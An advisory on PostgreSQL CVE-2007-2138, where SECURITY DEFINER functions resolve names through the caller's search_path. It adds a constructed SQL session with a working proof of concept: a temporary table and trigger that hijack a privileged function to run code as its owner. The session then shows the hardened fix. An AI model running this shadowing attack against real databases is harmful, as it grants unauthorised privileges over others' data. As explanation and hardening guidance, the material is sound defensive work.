SECURITY DEFINER functions are PostgreSQL functions that execute with the privileges of the role that owns the function rather than those of the role calling it. A security vulnerability in the PostgreSQL database server (see postgres(1)) may allow a local or remote PostgreSQL user who has authenticated with the PostgreSQL server to inject crafted objects (for example, functions, tables, or operators) into a schema that the server searches before the schema holding the objects a SECURITY DEFINER function was written to use, so that the function resolves the attacker's object instead. This may allow that user to execute arbitrary SQL with the elevated privileges of the owner of the SECURITY DEFINER function, and thereby control the database, or to shadow any table the function references with a modified version of their own and have the function process it.
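The following PostgreSQL session shows the shadowing described above and the usual hardening. It is an added example, not code from the advisory or from the PostgreSQL project; the roles "owner" and "lowpriv", the schema "app" and the function app.record_note are constructed for illustration. Step 2 is run from a session that may SET ROLE to lowpriv (or by connecting as lowpriv).

```sql
-- Added example (constructed roles, schema and function; not from the advisory).

-- 1. Vulnerable pattern: the function body runs with the OWNER's privileges,
--    but its unqualified names are resolved at call time through the CALLER's
--    search_path. Nothing pins that path.
CREATE SCHEMA app;
CREATE TABLE app.audit_log (who text, note text, at timestamptz DEFAULT now());

CREATE FUNCTION app.record_note(p_note text) RETURNS void
LANGUAGE plpgsql SECURITY DEFINER AS $$
BEGIN
  INSERT INTO audit_log (who, note) VALUES (session_user, p_note);  -- unqualified
END
$$;
-- EXECUTE on a new function is granted to PUBLIC by default, so any role may call it.

-- 2. Attack from an unprivileged session. Temporary objects live in pg_temp,
--    which is searched for relations before every other schema unless the
--    search_path places it explicitly, so the INSERT is redirected to the
--    attacker's table, and the attacker's trigger fires as the function owner.
SET ROLE lowpriv;
CREATE TEMP TABLE audit_log (who text, note text);
CREATE FUNCTION pg_temp.hijack() RETURNS trigger LANGUAGE plpgsql AS $$
BEGIN
  -- Everything here executes as the owner of app.record_note: this INSERT
  -- into the real table succeeds although lowpriv has no privilege on it.
  INSERT INTO app.audit_log (who, note)
    VALUES (current_user, 'trigger body ran as ' || current_user);
  RETURN NEW;
END
$$;
CREATE TRIGGER hijack_trg BEFORE INSERT ON audit_log
  FOR EACH ROW EXECUTE PROCEDURE pg_temp.hijack();
SELECT app.record_note('hello');  -- row lands in pg_temp.audit_log, trigger runs as owner
RESET ROLE;

-- 3. Hardened form: schema-qualify every reference and fix search_path for the
--    duration of the call. The SET clause on CREATE FUNCTION exists from
--    PostgreSQL 8.3 on; pg_temp is listed LAST so temporary objects cannot
--    shadow anything, and EXECUTE is revoked from PUBLIC and granted explicitly.
CREATE OR REPLACE FUNCTION app.record_note(p_note text) RETURNS void
LANGUAGE plpgsql SECURITY DEFINER
SET search_path = pg_catalog, app, pg_temp
AS $$
BEGIN
  INSERT INTO app.audit_log (who, note) VALUES (session_user, p_note);
END
$$;
REVOKE ALL ON FUNCTION app.record_note(text) FROM PUBLIC;
GRANT EXECUTE ON FUNCTION app.record_note(text) TO lowpriv;
```

After step 3, re-running step 2 inserts into app.audit_log regardless of what the caller has created in pg_temp or in any other schema it can write to, because the function no longer consults the caller's search_path and names nothing that an untrusted role can shadow.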
This issue is described in the following documents:
CVE-2007-2138 at http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2138
PostgreSQL Security Information at http://www.postgresql.org/about/news.791